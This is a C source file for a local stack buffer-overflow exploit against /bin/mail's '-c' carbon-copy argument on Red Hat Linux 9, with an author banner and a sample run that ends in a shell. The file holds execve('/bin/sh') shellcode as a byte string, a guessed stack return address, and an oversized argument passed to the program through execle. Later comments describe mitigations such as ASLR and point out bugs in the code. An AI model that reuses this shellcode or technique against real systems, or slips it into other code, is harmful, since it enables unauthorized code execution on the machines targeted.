/*-==================================================================-
--=[ /bin/mail '-c' carbon copy argument stack overflow
--=[ Local exploit [no suid] by nitrous <nitrous@danitrous.org>
--=[ Tested on Red Hat Linux 9.0
--=[ Technical Information: http://www.securityfocus.com/bid/7760/info/

[nitrous@localhost]$ gcc mail_env_exploit.c -o mail_env_exploit
[nitrous@localhost]$ ./mail_env_exploit
.
Cc: too long to edit
sh-2.05b$ id
uid=500(nitrous) gid=500(nitrous) groups=500(nitrous)
-===================================================================-*/
#include<string.h>

#define	BUFFER_SIZE	8500

/* Payload string passed to the target as its only environment entry (see
 * envir0n in main()).  The author's trailing comment describes it as a
 * jmp/call execve() stub ending in the "/bin/sh" path.  None of the escaped
 * bytes is 0x00, so strlen() in main() measures the whole string.
 * Defender's note: this class of attack relies on code placed in an
 * environment string being reachable at a guessed stack address; a
 * non-executable stack and ASLR are the standard mitigations. */
char nitrous_egg[]=
"\xeb\x14\x5b\x31\xd2\x88\x53\x07"
"\x89\x5b\x08\x89\x53\x0c\x8d\x4b"
"\x08\x6a\x0b\x58\xcd\x80\xe8\xe7"
"\xff\xff\xff/bin/sh";	//jmp-call execve()

/*
 * Builds an oversized "-c" (carbon copy) argument and exec's /bin/mail
 * with it, reproducing the stack overflow described in the file header.
 *
 * Only <string.h> is included (top of file), so malloc() and execle() are
 * called through implicit declarations: invalid since C99 and a hard error
 * in C23.  On an LP64 build the implied int return type would also
 * truncate malloc()'s pointer.
 *
 * Returns: nothing meaningful.  main() falls off the end without a return,
 * and a failed execle() is never checked, so the process exits quietly if
 * the exec does not happen.
 */
int main()
{
	/* 8500-byte heap buffer; the malloc() result is never checked for NULL. */
	char *carb0n = (char *)malloc(BUFFER_SIZE);
	/* envp for the exec'd program: the payload is the only environment entry. */
	char *envir0n[2]={nitrous_egg,NULL};
 
	/* Guess at where the single environment string will sit near the top of
	 * the exec'd process's 32-bit stack: a fixed high address minus the
	 * lengths of the payload and the program path.  NOTE(review): the
	 * constant is tied to the Red Hat 9 layout named in the header and is
	 * not verified here; stack randomization (ASLR) makes such a fixed
	 * guess wrong, which is why that mitigation defeats this technique. */
	unsigned long retaddr=0xbffffffa-strlen(nitrous_egg)-strlen("/bin/mail");
 
	/* Fill the whole buffer with copies of retaddr at a 4-byte stride.  The
	 * store width is sizeof(unsigned long): the code assumes 4; if it is 8,
	 * the last iteration (x == 8496) writes 4 bytes past the allocation.
	 * No '\0' is ever written, so the argument handed to execle() below is
	 * not a terminated string and is read past the end of the buffer. */
	int x;
	for(x=0;x<BUFFER_SIZE;x+=4)
		*(unsigned long *)&carb0n[x]=retaddr;

/* Replace this process with /bin/mail, passing the filled buffer as the
 * "-c" argument and envir0n as the environment.  The return value of
 * execle() is not checked. */
execle("/bin/mail", "mail","-s","eaea","-c",carb0n,"nitrous@danitrous.org",NULL,envir0n);
}
